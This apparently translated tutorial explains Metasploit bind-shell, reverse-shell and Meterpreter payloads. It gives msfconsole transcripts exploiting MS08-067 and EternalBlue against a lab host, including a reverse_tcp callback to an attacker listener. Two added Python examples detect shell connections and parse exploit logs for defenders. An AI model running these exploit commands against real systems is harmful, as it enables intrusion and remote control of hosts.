This post introduces several common payloads and looks at what each one does from the point of view of exploitation.
bind shell
A bind shell provides a remote shell connection. Once a vulnerability on the target host has been exploited and the shellcode has executed, the tester can run a bind shell on a chosen port of the target host so that other hosts can go on controlling it. The attacker then uses a standard tool that tunnels stdin/stdout over a TCP connection (Netcat, for example) to connect to the compromised host and keeps controlling it through the bind shell. The usage model is very much like a Telnet server and client. It mainly suits testers who reach the network through NAT, or cases where a firewall sits between the attacker's machine and the target, that is, any situation in which the target host cannot connect directly to the attacker's IP address.
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.14
rhosts => 192.168.1.14
msf5 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] 192.168.1.14:445 - Automatically detecting the target...
Metasploit connects to the bind shell automatically through its built-in payload handler. We can also write our own shellcode: use the exploit to plant the bind shell, then connect to it with a third-party tool such as Netcat.
reverse shell
A reverse shell works the opposite way from a bind shell. Rather than binding a port on the target and passively waiting for the attacker's machine to connect, it "calls back": the target host actively connects to the attacker's IP address and port and hands over a shell. A reverse shell suits cases where the target host reaches the network through NAT, or sits behind a firewall, so that the tester cannot reach the target directly from the outside.
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.14
rhosts => 192.168.1.14
msf5 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/shell
set PAYLOAD windows/shell/bind_hidden_ipknock_tcp  set PAYLOAD windows/shell/reverse_ord_tcp
set PAYLOAD windows/shell/bind_hidden_tcp          set PAYLOAD windows/shell/reverse_tcp
set PAYLOAD windows/shell/bind_ipv6_tcp            set PAYLOAD windows/shell/reverse_tcp_allports
set PAYLOAD windows/shell/bind_ipv6_tcp_uuid       set PAYLOAD windows/shell/reverse_tcp_dns
set PAYLOAD windows/shell/bind_named_pipe          set PAYLOAD windows/shell/reverse_tcp_rc4
set PAYLOAD windows/shell/bind_nonx_tcp            set PAYLOAD windows/shell/reverse_tcp_uuid
set PAYLOAD windows/shell/bind_tcp                 set PAYLOAD windows/shell/reverse_udp
set PAYLOAD windows/shell/bind_tcp_rc4             set PAYLOAD windows/shell_bind_tcp
set PAYLOAD windows/shell/bind_tcp_uuid            set PAYLOAD windows/shell_hidden_bind_tcp
set PAYLOAD windows/shell/reverse_ipv6_tcp         set PAYLOAD windows/shell_reverse_tcp
set PAYLOAD windows/shell/reverse_nonx_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.14     yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.1.12:4444
Note that when setting up a reverse shell you must set the attacker's IP address (LHOST).
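The bind shell and reverse shell sections above differ in which side opens the connection, and that difference is what a defender can look for on the host. The following is an added example, not code from the original post: it classifies constructed connection records into a bind-shell footprint (a listener that was not in a clean baseline) and a reverse-shell footprint (an outbound connection from an ephemeral port to a handler port such as the LPORT 4444 default shown above). Process names, the baseline and every record are constructed sample data.

```python
# Added example (not from the original post): tell a bind-shell footprint from a
# reverse-shell footprint in host connection records. A bind shell leaves a new
# LISTEN socket on the compromised host that the attacker connects to; a reverse
# shell appears as an outbound ESTABLISHED connection from the compromised host to
# the attacker's LHOST:LPORT (4444 is the LPORT default shown in the options above).
# Process names, the baseline and every record below are constructed sample data.
from dataclasses import dataclass

@dataclass(frozen=True)
class Conn:
    local: str      # "ip:port"
    remote: str     # "ip:port", or "*:*" for a listener
    state: str      # "LISTEN" or "ESTABLISHED"
    process: str    # image name of the owning process

HANDLER_PORTS = {4444}      # Metasploit's default LPORT
EPHEMERAL_MIN = 49152       # start of the Windows dynamic (client) port range

def port_of(addr: str) -> int:
    return int(addr.rsplit(":", 1)[1])

def classify(conns, baseline_listeners):
    """baseline_listeners: set of (process, port) pairs taken from a clean snapshot.
    Returns {'bind': [...], 'reverse': [...]} with the records matching each pattern."""
    findings = {"bind": [], "reverse": []}
    for c in conns:
        if c.state == "LISTEN":
            # a listener absent from the clean baseline is the bind-shell footprint
            if (c.process, port_of(c.local)) not in baseline_listeners:
                findings["bind"].append(c)
        elif c.state == "ESTABLISHED":
            # target side of a reverse shell: ephemeral local port, remote on a handler port
            if port_of(c.local) >= EPHEMERAL_MIN and port_of(c.remote) in HANDLER_PORTS:
                findings["reverse"].append(c)
    return findings

BASELINE = {("svchost.exe", 135), ("System", 445), ("svchost.exe", 49152)}
SAMPLE = [  # constructed records; the 4444 entries mirror the handler addresses used above
    Conn("0.0.0.0:135", "*:*", "LISTEN", "svchost.exe"),
    Conn("0.0.0.0:445", "*:*", "LISTEN", "System"),
    Conn("0.0.0.0:4444", "*:*", "LISTEN", "svchost.exe"),                         # bind_tcp listener
    Conn("192.168.1.14:49398", "192.168.1.12:4444", "ESTABLISHED", "spoolsv.exe"),  # reverse_tcp callback
    Conn("192.168.1.14:50211", "203.0.113.5:443", "ESTABLISHED", "chrome.exe"),     # ordinary browsing
]

def demo():
    return classify(SAMPLE, BASELINE)

if __name__ == "__main__":
    for kind, hits in demo().items():
        for c in hits:
            print(f"{kind:8} {c.process:12} {c.local} -> {c.remote}")
```

Port matching is only a starting point: the payload list above includes variants such as reverse_tcp_allports and reverse_tcp_dns, so a production rule should key on the baseline and on which process owns the socket rather than on port 4444 alone.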
meterpreter
Meterpreter is an advanced, stealthy, multi-functional and dynamically extensible payload. It injects a DLL into the memory of a process on the target host (the injected DLL never exists on disk as a file), and it can load scripts and plugins at runtime. In the post-exploitation phase this dynamic loading greatly widens what a tester can do: privilege escalation, dumping system accounts, keylogging, installing persistent backdoors, enabling Remote Desktop and so on. By default the Meterpreter channel is encrypted for the whole session.
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD 15
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.1.14     yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.12
lhost => 192.168.1.12
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.12:4444
[+] 192.168.1.14:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.14:445 - Connecting to target for exploitation.
[+] 192.168.1.14:445 - Connection established for exploitation.
[+] 192.168.1.14:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.14:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.1.14:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.14:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.1.14:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 192.168.1.14:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.14:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.14:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.14:445 - Starting non-paged pool grooming
[+] 192.168.1.14:445 - Sending SMBv2 buffers
[+] 192.168.1.14:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.14:445 - Sending final SMBv2 buffers.
[*] 192.168.1.14:445 - Sending last fragment of exploit packet!
[*] 192.168.1.14:445 - Receiving response from exploit packet
[+] 192.168.1.14:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.14:445 - Sending egg to corrupted connection.
[*] 192.168.1.14:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.1.14
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.14:49398) at 2021-02-01 12:13:06 +0800
[+] 192.168.1.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > dir
Listing: C:\Windows\system32
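The msfconsole transcript above carries everything an analyst needs to reconstruct the session: the payload chosen, the handler address, the target and check that matched, the stage size and the session tuple with its timestamp. The following is an added example, not code from the original post or from Metasploit: a small parser that turns such a transcript into structured events for an incident timeline or an engagement review. SAMPLE_LOG is a constructed excerpt of the lines shown above.

```python
# Added example (not from the original post): extract the key facts from a
# msfconsole exploit/handler transcript. SAMPLE_LOG is a constructed excerpt of
# the output shown above; the regexes follow the line shapes in that output.
import re

SAMPLE_LOG = """\
PAYLOAD => windows/x64/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 192.168.1.12:4444
[+] 192.168.1.14:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] Sending stage (206403 bytes) to 192.168.1.14
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.14:49398) at 2021-02-01 12:13:06 +0800
"""

RE_PAYLOAD = re.compile(r"^PAYLOAD => (\S+)$", re.M)
RE_HANDLER = re.compile(r"^\[\*\] Started reverse TCP handler on (\S+)$", re.M)
RE_TARGET = re.compile(r"^\[\+\] (\S+) - Host is likely VULNERABLE to (\S+)!", re.M)
RE_STAGE = re.compile(r"^\[\*\] Sending stage \((\d+) bytes\) to (\S+)$", re.M)
RE_SESSION = re.compile(r"^\[\*\] (\w+) session (\d+) opened \((\S+) -> (\S+)\) at (.+)$", re.M)

def parse_msf_log(text: str) -> dict:
    """Return a dict of the events found in one exploit/handler transcript."""
    ev = {}
    if m := RE_PAYLOAD.search(text):
        ev["payload"] = m.group(1)
    if m := RE_HANDLER.search(text):
        ev["handler"] = m.group(1)              # LHOST:LPORT the attacker listens on
    if m := RE_TARGET.search(text):
        ev["target"], ev["check"] = m.group(1), m.group(2)
    if m := RE_STAGE.search(text):
        ev["stage_bytes"], ev["stage_to"] = int(m.group(1)), m.group(2)
    if m := RE_SESSION.search(text):
        ev["session"] = {
            "type": m.group(1), "id": int(m.group(2)),
            "handler": m.group(3),              # attacker side of the tuple
            "peer": m.group(4),                 # target host and its ephemeral source port
            "opened_at": m.group(5),
        }
        # a staged reverse payload should call back to the handler that was started
        ev["handler_matches"] = ev.get("handler") == ev["session"]["handler"]
    return ev

def demo():
    return parse_msf_log(SAMPLE_LOG)

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```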